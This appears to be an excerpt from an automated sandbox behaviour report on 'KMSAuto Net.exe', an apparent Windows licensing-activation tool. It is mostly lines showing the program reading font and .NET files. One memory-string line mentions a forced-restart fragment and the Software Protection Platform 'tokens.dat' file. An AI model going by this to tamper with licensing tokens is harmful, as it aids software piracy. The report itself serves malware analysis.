              Source: KMSAuto Net.exe, 00000002.00000000.252237819.0000000000012000.00000002.00000001.01000000.00000005.sdmp, KMSAuto Net.exe.0.dr; Binary or memory string: m/r /f /t 0ababccdabcdefgePathfgFlag Library not initialisedShell_TrayWndBelizeSoftwareProtectionPlatform\tokens.datBasqueNorwegianNot joined to any domain or group
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
